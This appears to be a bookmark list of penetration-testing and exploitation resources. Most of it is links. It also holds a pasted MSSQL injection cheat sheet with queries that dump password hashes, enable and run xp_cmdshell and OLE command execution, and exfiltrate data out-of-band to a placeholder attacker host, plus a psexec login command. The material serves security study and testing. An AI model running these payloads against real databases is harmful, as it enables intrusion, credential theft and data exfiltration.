24 results tagged exploitation
  • SQL Server UNC Path Injection Cheatsheet
    May 23, 2023 at 9:18:25 PM UTC
    - https://gist.github.com/nullbind/7dfca2a6309a4209b5aeef181b676c6e
    mssql exploitation unc
  • Guide - Vulnerable Kernel Drivers For Exploitation
    April 14, 2022 at 3:50:55 PM UTC
    - https://guidedhacking.com/threads/vulnerable-kernel-drivers-for-exploitation.15979/
    kernel driver exploitation windows privesc
  • hfiref0x/KDU - githubhot
    April 14, 2022 at 3:50:43 PM UTC
    - https://githubhot.com/repo/hfiref0x/KDU
    kernel driver exploitation windows privesc
  • CORS-USESEC18.pdf
    September 29, 2021 at 8:29:15 PM UTC
    - https://www.jianjunchen.com/papers/CORS-USESEC18.pdf
    paper cors study exploitation
  • РНР_wrappers.pdf
    November 11, 2020 at 11:24:43 AM UTC
    - https://www.ptsecurity.com/upload/corporate/ru-ru/webinars/ics/%D0%90.%D0%9C%D0%BE%D1%81%D0%BA%D0%B2%D0%B8%D0%BD_%D0%9E_%D0%B1%D0%B5%D0%B7%D0%BE%D0%BF_%D0%B8%D1%81%D0%BF_%D0%A0%D0%9D%D0%A0_wrappers.pdf
    php wrappers exploitation
  • Exploit with PHP Protocols / Wrappers - cdxy
    November 10, 2020 at 4:41:29 PM UTC
    - https://www.cdxy.me/?p=752
    php wrapper exploitation filters url include lfi rfi rce
  • GitHub - RPISEC/MBE: Course materials for Modern Binary Exploitation by RPISEC
    June 20, 2020 at 11:39:47 AM UTC
    - https://github.com/RPISEC/MBE
    binexp binary exploitation pwn
  • Windows exploitation - FullPwn Security Operations
    May 6, 2020 at 5:03:52 PM UTC
    - https://fullpwnops.com/windows-exploitation-pathway.html
    windows exploitation pwn exploit
  • Nightmare (binary exploitation)
    April 20, 2020 at 3:08:18 PM UTC
    - https://guyinatuxedo.github.io/
    binary exploitation pwn reverse engineering re ghidra gdb pwntools ctf
  • Heap overflow, and again :)
    April 15, 2020 at 2:37:41 PM UTC
    - http://security.cs.rpi.edu/courses/binexp-spring2015/lectures/17/10_lecture.pdf
    heap courses exploit pwn exploitation
  • More Heap Exploitation
    April 15, 2020 at 2:34:47 PM UTC
    - https://www.blackhat.com/presentations/bh-usa-07/Ferguson/Whitepaper/bh-usa-07-ferguson-WP.pdf
    heap exploitation exploit pwn malloc paper blackhat
  • Preface · Heap Exploitation
    April 15, 2020 at 2:34:29 PM UTC
    - https://heap-exploitation.dhavalkapil.com/
    heap exploit pwn exploitation tuto howto gettingstarted
  • LOLBAS

    Lolbins -> Windows
    GTFOBin -> Linux (https://gtfobins.github.io/)

    August 1, 2019 at 2:55:00 PM UTC
    - https://lolbas-project.github.io/
    gtfobin gtfo lolbins privesc pe exploitation hacking pentest jailbreak
  • BloodHound with Kali Linux: 101 - Red Teaming Experiments
    April 3, 2019 at 11:54:50 AM UTC
    - https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-with-bloodhound-on-kali-linux
    bloodhound windows hacking penstest active directory ad exploitation mapping ldap sharphound
  • PHP security exploit - list content of remote PHP file? - Stack Overflow
    April 1, 2019 at 11:29:13 PM UTC
    - https://stackoverflow.com/questions/20726247/php-security-exploit-list-content-of-remote-php-file
    php lfi wrapper include data type hacking pentest exploitation
  • A Virgil's Guide to Pentest: Escalation Time
    March 31, 2019 at 7:17:11 PM UTC
    - http://virgil-cj.blogspot.com/2018/02/escalation-time.html
    windows hacking pentest post exploitation guide howto
  • PowerUp: A Usage Guide – harmj0y
    March 31, 2019 at 7:04:32 PM UTC
    - https://www.harmj0y.net/blog/powershell/powerup-a-usage-guide/
    powerup powershell windows exploitation post hacking pentest
  • Using Credentials to Own Windows Boxes (from Kali)

    psexec.py 'DOMAIN\user:passw0rd1!'@10.10.10.10

    March 31, 2019 at 7:03:07 PM UTC
    - https://blog.ropnop.com/using-credentials-to-own-windows-boxes/
    psexec smb windows hacking post exploitation revshell
  • MSSQL Injection Cheat Sheet | pentestmonkey
    March 28, 2019 at 1:38:44 PM UTC
    - http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet
    cheatsheet mssql sql injection enumeration enum post exploitation privilege escalation hacking pentest windows
  • SQL Injection Cheat Sheet: MSSQL — GracefulSecurity
    Version
    SELECT @@version;
    SELECT @@VERSION LIKE '%2008%';
    
    User details
    SELECT user;
    SELECT current_user;
    SELECT SYSTEM_USER;
    SELECT USER_NAME();
    SELECT USER_NAME(2);
    SELECT SUSER_SNAME();
    SELECT loginame FROM master..sysprocesses WHERE spid=@@SPID;
    SELECT (CASE WHEN (IS_SRVROLEMEMBER('sysadmin')=1) THEN '1' ELSE '0' END);
    
    Database details
    SELECT DB_NAME();
    SELECT DB_NAME(5);
    SELECT name FROM master..sysdatabases;
    
    Database credentials
    SELECT name %2b ':'  %2b master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins;
    
    Server details
    SELECT @@servername; SELECT host_name(); SELECT SERVERPROPERTY('productversion'), SERVERPROPERTY('productlevel');
    
    Table Names
    SELECT name FROM master..sysobjects WHERE xtype='U';
    SELECT table_name FROM information_schema.tables;
    
    Columns Names
    SELECT name FROM master..syscolumns WHERE id = (SELECT id FROM master..sysobjects WHERE name = 'tablename');
    SELECT column_name FROM information_schema.columns WHERE table_name = 'tablename';
    
    No Quotes
    SELECT * FROM Users WHERE username = CHAR(97) + CHAR(98) + CHAR(99);
    ASCII(SUBSTRING(SELECT TOP 1 username FROM Users,1,1)) = 97;
    ASCII(SUBSTRING(SELECT TOP 1 username FROM Users,1,1)) < 128;
    
    String Concatenation
    SELECT CONCAT('a','a','a');
    SELECT 'a' %2b 'b' %2b 'c' %2b 'd';
    
    Conditionals
    IF 1=1 SELECT 'true' ELSE SELECT 'false';
    SELECT CASE WHEN 1=1 THEN true ELSE false END;
    
    Time-delay
    WAITFOR DELAY 'time_to_pass';
    WAITFOR TIME 'time_to_execute';
    
    Enable Command Execution
    EXEC sp_configure 'show advanced options', 1;
    EXEC sp_configure reconfigure;
    EXEC sp_configure 'xp_cmdshell', 1;
    EXEC sp_configure reconfigure;
    
    Command Execution
    EXEC master.dbo.xp_cmdshell 'cmd';
    
    Enable Alternative Command Execution
    EXEC sp_configure 'show advanced options', 1;
    EXEC sp_configure reconfigure;
    EXEC sp_configure 'OLE Automation Procedures', 1;
    EXEC sp_configure reconfigure;
    
    Alternative Command Execution
    DECLARE @execmd INT;
    EXEC SP_OACREATE 'wscript.shell', @execmd OUTPUT;
    EXEC SP_OAMETHOD @execmd, 'run', null, '%systemroot%\system32\cmd.exe /c';
    
    "RunAs"
    SELECT * FROM OPENROWSET('SQLOLEDB', '127.0.0.1';'sa';'password', 'SET FMTONLY OFF execute master..xp_cmdshell "dir"');
    EXECUTE AS USER = 'FooUser';
    
    Read Files
    BULK INSERT dbo.temp FROM 'c:\foobar.txt' WITH ( ROWTERMINATOR='\n' );
    
    Out-of-Band Retrieval
    ;declare @q varchar(200);set @q='\attacker.controlledserver'+(SELECT SUBSTRING(@@version,1,9))+'.malicious.com/foo'; exec master.dbo.xp_dirtree @q; --  
    
    Substrings
    SUBSTRING(table_name,1,1) FROM information_schema.tables = 'A';
    ASCII(SUBSTRING(table_name,1,1)) FROM information_schema.tables > 96;
    
    Retrieve Nth Line
    SELECT TOP 1 table_name FROM information_schema.tables;
    SELECT TOP 1 table_name FROM information_schema.tables WHERE table_name NOT IN(SELECT TOP 1 table_name FROM information_schema.tables);
    March 28, 2019 at 1:36:53 PM UTC
    - https://www.gracefulsecurity.com/sql-injection-cheat-sheet-mssql/
    xp_cmdshell windows cheatsheet exploitation post postexploitation mssql sql injection enumeration enum hacking pentest